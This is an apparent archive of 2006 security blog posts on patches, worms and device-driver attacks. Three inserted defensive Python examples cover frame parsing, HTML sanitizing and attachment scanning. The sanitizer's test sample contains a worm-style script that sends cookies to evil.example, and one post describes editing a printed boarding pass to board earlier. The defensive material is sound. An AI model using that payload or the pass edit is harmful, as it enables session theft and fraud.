August 10, 2006
POC Code for MS06-040
Metasploit has proof-of-concept code for exploiting MS06-040 (the Server Service vulnerability). The countdown to the worm begins.
Read More: Threats, Patching, Vulnerabilities
August 7, 2006
Blackberry Backchannel Blindsides Businesses
Wired has a story out of DefCon picturing BlackBerries as the perfect backdoor into your corporate network. Since many corporations inherently trust the BlackBerry straight in through their firewalls, it might be worth a read.
The program, called proxy, has to be placed on a Blackberry either physically or as a Trojan horse delivered by e-mail. Once installed, it causes the Blackberry to call back to the attacker’s system in the background, opening a communications channel between the attacker and the company’s internal network.
Details are sketchy, and I can’t find the mentioned “documents on its website” or get to their website at all, but the fact that he says he’ll release the app in the next week or so doesn’t make me feel all warm and fuzzy.
Blackberry a Juicy Hacker Target [Wired]
Read More: Threats, Vulnerabilities, Firewall, Wireless
August 2, 2006
New Trend: Attacks Against Device Drivers
The guys at Black Hat are demonstrating some interesting attacks against the device drivers for the wireless card in a MacBook Pro:
The video shows Ellch and Maynor targeting a specific security flaw in the Macbook’s wireless “device driver,” the software that allows the internal wireless card to communicate with the underlying OS X operating system.
This highlights an emerging class of attacks against device drivers. Should attacks like this become a trend, I suspect we’ll see the following:
- Wireless Cards Hit First: Expect many attacks to focus on wireless cards, and not just because they are remotely accessible. The fact that there are only a couple of chipset manufacturers will make attacks easier. Especially considering this:
After the demo, Ellch … will talk about a new tool he’s developing that can remotely scan and figure out the chipset and driver version of a wireless device on a target computer. So far, Ellch said the tool currently recognizes 13 different wireless device drivers, breaking them down by operating system and firmware version.
“I’m getting this tool to the point where it can tell you not only how many people in a room are running, say, Centrino or Broadcom devices, but that ‘x’ number are running them on a Windows box with a specific version of the driver,” Ellch said. “The useful thing for that information is that if you have a device driver exploit and it’s version-specific, you could tweak [the exploit] before you launch it.”
- Homogeneous Environments Hit Hardest: As demonstrated, Macs will be easier targets, but think about other homogeneous environments: corporate networks that use all the same PCs (or maybe just all the same NICs), ISPs that use all the same kind of DSL/cable modems, etc…
- Mitigations Slow to Come: There won’t be patches coming out of Windows Update for many of these, since the drivers come from the chipset vendor or the OEM. Expect longer windows of vulnerability, and expect traditional mitigations like firewalls to prove ineffective: the malicious 802.11 frames are handled by the driver before the network stack (and any host firewall) ever sees them.
So what do we do? Assuming the attack involves overrunning a buffer, some sort of kernel-level buffer overflow protection in a Host Intrusion Prevention-type product seems to be in order. The whole article is worth a read. Share your thoughts by leaving a comment below.
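To make the “overrunning a buffer” point concrete, here is an added example (mine, not code from the post or from Maynor and Ellch, whose exploit details are not public): a strict parser for the tagged information elements (IEs) in an 802.11 beacon or probe response, which is exactly the part of a management frame a wireless driver has to parse from untrusted, over-the-air input. Each IE is `[id:1][len:1][value:len]`. A driver that trusts `len`, or copies an SSID into a fixed 32-byte buffer without checking it, is the classic overflow; the parser below refuses both. The frame bytes are constructed for the example.

```python
"""Added example: bounds-checked parsing of 802.11 beacon information
elements, the checks a wireless driver must make on over-the-air input.
Not code from the post or from the researchers it cites; frames are constructed."""
import struct
from typing import Optional

SSID_MAX = 32          # 802.11 limits an SSID to 32 octets
IE_SSID = 0
IE_RATES = 1
IE_DS = 3              # DS parameter set: current channel


def parse_ies(body: bytes) -> dict:
    """Parse IEs from a beacon body (the bytes after the 12-byte fixed fields).

    Raises ValueError instead of trusting a length that runs past the end of
    the frame or that exceeds the element's fixed-size destination buffer.
    A driver that skipped either check is the overflow the post describes."""
    ies = {}
    pos = 0
    while pos < len(body):
        if len(body) - pos < 2:
            raise ValueError("truncated IE header at offset %d" % pos)
        ie_id, ie_len = body[pos], body[pos + 1]
        pos += 2
        if ie_len > len(body) - pos:
            raise ValueError("IE %d declares %d bytes, overruns frame" % (ie_id, ie_len))
        value = body[pos:pos + ie_len]
        pos += ie_len
        if ie_id == IE_SSID and ie_len > SSID_MAX:
            # The destination buffer is 32 bytes; copying more is the bug.
            raise ValueError("SSID length %d exceeds %d" % (ie_len, SSID_MAX))
        ies[ie_id] = value
    return ies


def parse_beacon(frame_body: bytes) -> dict:
    """Validate the fixed part of a beacon body, then parse its IEs."""
    if len(frame_body) < 12:
        raise ValueError("beacon body shorter than the fixed fields")
    return parse_ies(frame_body[12:])


def build_beacon_body(ssid: bytes, rates: bytes = b"\x82\x84\x8b\x96",
                      channel: int = 6, ssid_len: Optional[int] = None) -> bytes:
    """Constructed beacon body: fixed fields followed by SSID, rates and DS IEs.
    `ssid_len` lets a caller lie about the SSID length the way a malicious
    frame would (length byte larger than the bytes that follow)."""
    fixed = struct.pack("<QHH", 0, 100, 0x0401)  # timestamp, beacon interval, capability
    declared = len(ssid) if ssid_len is None else ssid_len
    ssid_ie = bytes([IE_SSID, declared]) + ssid
    rates_ie = bytes([IE_RATES, len(rates)]) + rates
    ds_ie = bytes([IE_DS, 1, channel])
    return fixed + ssid_ie + rates_ie + ds_ie


if __name__ == "__main__":
    print(parse_beacon(build_beacon_body(b"corp-wifi")))
    for bad in (build_beacon_body(b"A" * 200),              # SSID too long for a 32-byte buffer
                build_beacon_body(b"abc", ssid_len=0xFF)):  # length byte overruns the frame
        try:
            parse_beacon(bad)
        except ValueError as e:
            print("rejected:", e)
```

The two rejected frames are the two failure modes a driver has to handle: an element longer than the buffer it is copied into, and a length byte that points past the end of the received frame. Neither check needs anything from the IP layer, which is why a host firewall cannot substitute for them.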
Hijacking a Macbook in 60 Seconds or Less [Security Fix]
Read More: Threats, Patching, Vulnerabilities, Firewall, Wireless, Macs
July 31, 2006
Hack Your Southwest Boarding Pass
A how-to on boarding early on Southwest…
…Use any HTML editor to change the “B” or “C” graphic on your saved boarding pass to the “A” graphic that you saved.
Not rocket science, but it points out the inherent insecurity of boarding passes you print out yourself: the pass is an unsigned HTML page, so anything on it can be edited before printing. I suspect it’s similarly easy with other airlines. Recently, Southwest filed suit against APassOnly.com, which acted as a proxy to get you first in line for boarding, so I don’t expect this site to stay up long.
How To Change A Southwest Airlines Boarding Pass From a “C” or “B” to an “A”! [boardfast.blogspot.com]
Read More: Web, Authentication, Vulnerabilities
July 26, 2006
Hacking Vista
There seems to be a rash of news reports lately about vulnerabilities in Vista. Maybe it’s a quick way to grab a headline, to beat up the product that promises a better security model but has been delayed indefinitely. The attacks are interesting, and reinforce that no new OS will be a fix-all for our security issues.
However, keep in mind that these tests are being run against a beta, and Microsoft has already fixed a number of the issues. I say let them hack away; after all, isn’t that part of why Microsoft made the beta public?
Hacking the Vista Kernel [Dark Reading]
Symantec criticizes Vista’s User Account Control technology [ARS Technica]
Read More: Vulnerabilities, Windows
July 24, 2006
Weaknesses in Whois Exploited by Domain Squatters
eWeek columnist Larry Seltzer looks to find out why domain names he searches for mysteriously get registered hours after he looks them up. Seems the squatters are exploiting weaknesses in the privacy of whois searches:
I decided to run some tests, so I picked three names out of the air and checked them with the CNet Domain Search page including myfuzzycat.com and lickmynose.com.
I let the matter go and about 30 hours later I checked with a separate whois service and determined that the domains belonged to Chesterton Holdings.
I’ve never had this happen to me, but it’s a disturbing trend.
Read More: Web, Vulnerabilities
July 17, 2006
McAfee: Ooops, We Patched It
McAfee claims to have “accidentally” patched a major vulnerability in their EPO management server agents.
“We did not realize that we had fixed a security vulnerability until eEye alerted us to the problem last week,” Viega said. “We were optimizing the system, not looking for security vulnerabilities.” The optimization included changing from storing data in files to storing it in memory, which removed the flaw, he said.
It’s bad enough when security vendors have vulnerabilities in their products. It’s even worse when they don’t realize they’re fixing a flaw.
Of course the real irony is that eEye is a McAfee competitor. If only McAfee had a division that discovers vulnerabilities in applications… Oh wait, they do.
Read More: Anti-Virus, Patching, D' Oh!, Vulnerabilities, Spyware
July 12, 2006
18 Vulnerabilities, 7 Patches, 1 Barrel of Monkeys
July brings fixes for 18 vulnerabilities bundled in 7 patches. July also marks the official end of security support for all Windows 9x products. Let us pause and take a moment of silence for our fallen friends of old…
Now back to our regularly scheduled patch announcement:
- MS06-033 .NET 2.0 Application Folder Information Disclosure Vulnerability - “could allow an attacker to bypass ASP.Net security and gain unauthorized access to objects in the Application folders explicitly by name.” Yawn.
- MS06-034 Vulnerability in Microsoft Internet Information Services using Active Server Pages Could Lead To Remote Code Execution - The only people who can exploit this are ones that can already upload ASP files to an IIS server. That basically makes it a privilege escalation attack, even though it uses a buffer overflow to accomplish it. Not too serious, and if you have untrusted people uploading ASP files to your web server, you have bigger problems.
- MS06-035 Vulnerability in Server Service Could Allow Remote Code Execution - This is the granddaddy of the patches, and Microsoft should create an uber-critical category for patches like this. It’s wormable (no authentication, reachable over SMB), and makes a good case for personal firewalls. Get this one out fast.
- MS06-036 Vulnerability in DHCP Client Service Could Allow Remote Code Execution - This one’s pretty critical, too. But the attacker has to be on the same subnet (broadcast domain) as the victim, since that’s as far as a spoofed DHCP reply travels.
- MS06-037 Vulnerability in Microsoft Excel Could Allow Remote Code Execution - Open a malicious Excel doc and you are owned. In Office 2000, just visiting a website could do it. Already exploits in the wild.
- MS06-038 Vulnerability in Microsoft Office Could Allow Remote Code Execution - Same as 06-037, except it applies to any Office doc and there are no known exploits yet.
- MS06-039 Vulnerability in Microsoft Office Could Allow Remote Code Execution - Same as 06-038.
Get ‘em done.
Security Bulletin Summary [Microsoft]
Microsoft Patches 18 Security Flaws in Windows, Office [Security Fix]
Read More: Threats, Patching, Bots, Vulnerabilities, Windows
June 14, 2006
Exploits Available for Yesterday’s MS Patches
There are reports of publicly available exploit code for the following Microsoft vulnerabilities:
- MS06-024: Windows Media Player.
- MS06-025: RRAS
- MS06-027: Word remote code execution
- MS06-030: SMB Privilege Escalation.
- MS06-032: IP Source Routing Exploit.
Let’s get ‘em patched.
More Windows Exploits Out; Hacker Wins $10K Challenge [Security Fix]
Exploits for most recent Microsoft Patches [SANS ISC]
Read More: Patching, Vulnerabilities, Windows
June 13, 2006
Yahoo! Worm a Harbinger of Those to Come
There’s some JavaScript malware worming its way around Yahoo! Mail. There aren’t a ton of users affected, and Yahoo says it has put a mitigation in place. The more disturbing thing is the trend, as Michael Haisley at the SANS ISC points out:
After testing several popular web applications, we have found that several are in fact vulnerable to the very same type of exploit. Good coding practices, verifying that users are coming from an authorized form and that they are not submitting malicious code can protect developers against this type of exploit.
First MySpace, now Yahoo Mail, what’s next? As Web 2.0 sites become more functional (and complex) we’ll be seeing more and more of these kinds of exploits. The root cause in both cases is the same: user-supplied HTML rendered in another user’s session without being stripped of script.
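The “not submitting malicious code” half of the SANS advice is output sanitization: a webmail front end must render untrusted HTML bodies without letting script through. As an added example (not code from Yahoo, MySpace or the ISC), here is an allow-list sanitizer built on Python’s standard-library HTML parser. It keeps a short list of harmless tags and attributes and drops everything else, including `<script>` blocks, `on*` event handlers, and `javascript:` links. The message bodies in the block are constructed, and the tag allow-list is an assumption chosen for the example.

```python
"""Added example: allow-list HTML sanitizer for untrusted message bodies.
Not code from Yahoo or the SANS ISC; the allow-list and samples are mine."""
from html import escape
from html.parser import HTMLParser

# Assumed allow-list: formatting and links only. Anything not listed is dropped.
ALLOWED_TAGS = {"b", "i", "u", "p", "br", "a", "ul", "ol", "li", "blockquote"}
ALLOWED_ATTRS = {"a": {"href"}}
SAFE_SCHEMES = ("http://", "https://", "mailto:")
VOID_TAGS = {"br"}
DROP_WITH_CONTENT = {"script", "style"}   # drop the tag *and* its text


class Sanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.skip_depth = 0   # >0 while inside <script>/<style>

    def handle_starttag(self, tag, attrs):
        if tag in DROP_WITH_CONTENT:
            self.skip_depth += 1
            return
        if self.skip_depth or tag not in ALLOWED_TAGS:
            return            # unknown tag (img, iframe, object, ...) is removed
        clean = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue      # drops onload=, onerror=, style=, ...
            if name == "href":
                target = (value or "").strip().lower()
                if not target.startswith(SAFE_SCHEMES):
                    continue  # drops javascript:, data:, vbscript: links
            clean.append(' %s="%s"' % (name, escape(value or "", quote=True)))
        self.out.append("<%s%s>" % (tag, "".join(clean)))

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)

    def handle_endtag(self, tag):
        if tag in DROP_WITH_CONTENT:
            self.skip_depth = max(0, self.skip_depth - 1)
            return
        if self.skip_depth or tag not in ALLOWED_TAGS or tag in VOID_TAGS:
            return
        self.out.append("</%s>" % tag)

    def handle_data(self, data):
        if not self.skip_depth:
            # Text is re-escaped, so decoded entities cannot reintroduce markup.
            self.out.append(escape(data, quote=False))


def sanitize(html: str) -> str:
    """Return `html` reduced to the allow-listed markup, script-free."""
    p = Sanitizer()
    p.feed(html)
    p.close()
    return "".join(p.out)


if __name__ == "__main__":
    # Constructed sample in the style of a webmail worm: script, an event
    # handler on an image, and a javascript: link.
    worm = ('<p>hi</p><script>document.location="http://evil.example/"'
            '+document.cookie</script><img src=x onerror="alert(1)">'
            '<a href="javascript:alert(1)">x</a>')
    print(sanitize(worm))
```

The sanitizer is deliberately an allow-list rather than a block-list of known bad tags; the Yahoo worm is one of many ways to smuggle script past a filter that only looks for `<script>`. The other half of the ISC advice (checking that a request really came from the site’s own form, i.e. a CSRF token) is a separate control.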
Yahoo Webmail Worm on the Loose [Security Fix]
Javascript/AJAX/Worm Like Behavior [SANS ISC]
UPDATE: Information Week has a good article outlining the risks of javascript.
Read More: Threats, Web, Vulnerabilities
June 9, 2006
12 Microsoft Patches Next Week
Looks like June will be a big Microsoft patch month:
- Nine security bulletins for Microsoft Windows, the highest maximum severity rating for these is “critical.”
- One security bulletin affecting Microsoft Exchange. The highest maximum severity rating for this is “important.”
- Two security bulletins affecting Microsoft Office. The highest maximum severity rating for these is “critical.” [emphasis added]
Included in the Office patches will be fixes for the Word 0-day vulnerability.
June 2006 Advance Notification [Microsoft Security Response Center Blog]
Read More: Patching, Vulnerabilities, Windows
June 5, 2006
How Much Do You Need to Worry about Macs?
If your organization is like most, there are a few Macs floating around. SANS tells us that it’s one of the 20 biggest things we should be worried about. At the same time Apple has commercials touting their security over PCs. So it raises the question, “How much should you be worried about Macs?”
Let’s start with some facts:
- OS X has many great security features built in, like a Personal Firewall, Auto Updates, and File/Folder Encryption.
- OS X comes out of the box with most unnecessary services turned off and users usually don’t run as a admin level account.
- OS X is vulnerable to viruses and worms.
- People in your organization probably do store critical information on a Mac.
- Lots of vulnerabilities come out for Macs.
What should you be doing about it? Some. Macs probably aren’t your biggest risk, but they need to be on your radar. I agree with SANS that the risk is increasing, although it’s nowhere near the top 20 things I worry about.
What should you be doing:
- Educating users that they are not immune from security issues.
- Ensuring they are configured securely, with Auto Updates on, the desktop firewall enabled, and unnecessary services turned off. Just because it came out of the box this way doesn’t mean it’s still this way.
Most Mac users I know have an independent streak to them and will probably resist any “big brothering” by the security group. With a little diplomacy and reasonableness you should be able to win them over.
Read More: Threats, Patching, Vulnerabilities, Macs
May 31, 2006
Random Memory Writing in Vista
Microsoft takes a big step toward making vulnerabilities harder to exploit. In short, system code is loaded at a different address each boot, so an exploit that overflows a buffer can no longer count on knowing where the library function it wants to jump to will be.
“In short, when you boot a Windows Vista Beta 2 computer, we load system code into different locations in memory. This helps defeat a well-understood attack called ‘return-to-libc’, where exploit code attempts to call a system function,” Howard explained.
He said the job of ASLR is to move these function entry points around in memory so they are in unpredictable locations.
The article also links to a 25-page Word Doc that summarizes the new security features in Vista.
Microsoft Finds (Random) Way to Secure Vista [eWeek]
Microsoft Windows Vista Security Advancements (Word Doc) [Microsoft]
Read More: Vulnerabilities, Windows
May 30, 2006
Ballmer Discovers the Joys Of Malware
In a recent speech, MS Big-Wig Jim Allchin recounts a story of CEO Steve Ballmer trying to clean up a severely infested PC for 2 days.
Ballmer spent the better part of the next two days trying to rid this PC of worms, viruses, spyware, malware, severe fragmentation, and well, you name it. Picture it: the world’s 24th wealthiest person, a man worth $13.6 billion according to Forbes magazine, sitting at a table for two days, playing tech support. It was, Allchin says, a humbling experience.
It eventually took an MS team of engineers to clean it up. In the real world tech support would have backed up the data and re-imaged it in 20 minutes. Still, I’m glad Steve got to enjoy life in the trenches for a while.
Even the Builders of Windows Find Tech Support a Challenge [ITworld]
Read More: Anti-Virus, Vulnerabilities, Windows
May 23, 2006
0-Day Word Vulnerability Roundup
Friday brought us yet another zero-day attack. Word has a previously unannounced hole in it that is being exploited by an email-propagating worm that plants a trojan. Word 2003 and XP are definitely vulnerable; there seems to be conflicting info on Word 2000. Since there’s no patch, everyone has some ideas about what you might do. Potential mitigations I’ve seen suggested include:
- Switch from MS Word to OpenOffice. (SANS ISC)
- Quarantine all attachments for 6-12 hours. (SANS ISC)
- Force people to run Word in “Safe Mode” (Microsoft)
- Don’t allow users to store important data on the desktop. (SANS ISC)
If you can do any of these, great. But for those of us who live in the real world, here are some things you might try:
- Block Outbound traffic to the site the trojan phones home to: localhosts dot 3322 dot org. SANS says the owner has changed the IP several times, so using your DNS servers to blackhole the name may be the most effective.
- Block Word attachments through email. People will complain, and it only works until the exploit changes and starts zipping the Word doc first (or renaming it), so match on file content rather than on the .doc extension if your gateway can.
- Latest AV signatures. Most of the vendors are rating the exploit low, so they are not turning out signatures very fast, but it’s better than nothing.
- User education about not opening Word Docs from untrusted sources.
- Use advanced AV features or Host-Based IPS to block the writing of the trojan files to specific directories.
- IDS/IPS signatures to the phone-home site: localhosts dot 3322 dot org.
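The attachment-blocking item above fails as soon as the worm renames or zips the document. As an added example (mine, not code from SANS, Microsoft or any AV vendor), here is a mail-gateway check that classifies attachments by content instead of file name: Word, Excel and PowerPoint 97-2003 files are all OLE2 compound documents and start with the same 8-byte signature, so the scanner looks for that signature directly and recurses into zip archives. The attachments in the block are constructed; the size and nesting limits are assumptions.

```python
"""Added example: content-based detection of Office documents in mail
attachments, including inside zips. Not code from SANS or Microsoft;
sample attachments are constructed."""
import io
import zipfile

OLE2_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"   # Office 97-2003 compound file
ZIP_MAGIC = b"PK\x03\x04"
MAX_DEPTH = 3                       # assumed: nested zips to follow
MAX_MEMBER = 50 * 1024 * 1024       # assumed: refuse to inflate huge members


def is_ole2(data: bytes) -> bool:
    return data[:8] == OLE2_MAGIC


def find_office_docs(name: str, data: bytes, depth: int = 0) -> list:
    """Return [(path, kind)] for every OLE2 document found in `data`,
    descending into zip archives up to MAX_DEPTH. Extension is ignored."""
    hits = []
    if is_ole2(data):
        hits.append((name, "ole2"))
    elif data[:4] == ZIP_MAGIC and depth < MAX_DEPTH:
        try:
            with zipfile.ZipFile(io.BytesIO(data)) as zf:
                for info in zf.infolist():
                    path = name + "/" + info.filename
                    if info.file_size > MAX_MEMBER:
                        hits.append((path, "oversize"))     # treat as suspicious
                        continue
                    hits.extend(find_office_docs(path, zf.read(info.filename), depth + 1))
        except zipfile.BadZipFile:
            hits.append((name, "corrupt-zip"))             # also worth a look
    return hits


def quarantine_decision(attachments: dict) -> dict:
    """attachments: {filename: bytes}. Returns {filename: path-that-tripped or None}."""
    decision = {}
    for fname, blob in attachments.items():
        found = find_office_docs(fname, blob)
        decision[fname] = found[0][0] if found else None
    return decision


# --- constructed sample data -------------------------------------------------
def make_fake_doc(payload: bytes = b"") -> bytes:
    """OLE2-looking blob: correct signature followed by junk (not a real document)."""
    return OLE2_MAGIC + b"\x00" * 24 + payload


def make_zip(entries: dict) -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for member, content in entries.items():
            zf.writestr(member, content)
    return buf.getvalue()


if __name__ == "__main__":
    doc = make_fake_doc(b"exploit goes here")
    sample = {
        "report.doc": doc,                                  # obvious case
        "report.txt": doc,                                  # renamed, still OLE2
        "report.zip": make_zip({"inner.doc": doc}),         # zipped first
        "nested.zip": make_zip({"a.zip": make_zip({"x.bin": doc})}),
        "photo.jpg": b"\xff\xd8\xff" + b"\x00" * 16,        # not Office, passes
    }
    for fname, why in quarantine_decision(sample).items():
        print("%-12s %s" % (fname, "QUARANTINE (%s)" % why if why else "deliver"))
```

Pair this with the 6-12 hour quarantine suggested above rather than an outright block: the content check decides what goes into the holding queue, and the delay gives the AV vendors time to ship a signature. The signature match is cheap, but note it flags every legacy Office file, not just Word, which is the right tradeoff while the hole is unpatched.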
Link RoundUp:
News.com article
eWeek Article
Microsoft Advisory Bulletin
F-Secure: Info on the Exploit, Some Background
SecurityFocus Summary
Updates:
SecuriTeam Has a Registry Hack Work Around
We’ve had (untested) reports from McAfee that the Buffer Overflow Protection in the 8.0i AV client will protect against any exploit to this vulnerability, regardless of DAT version.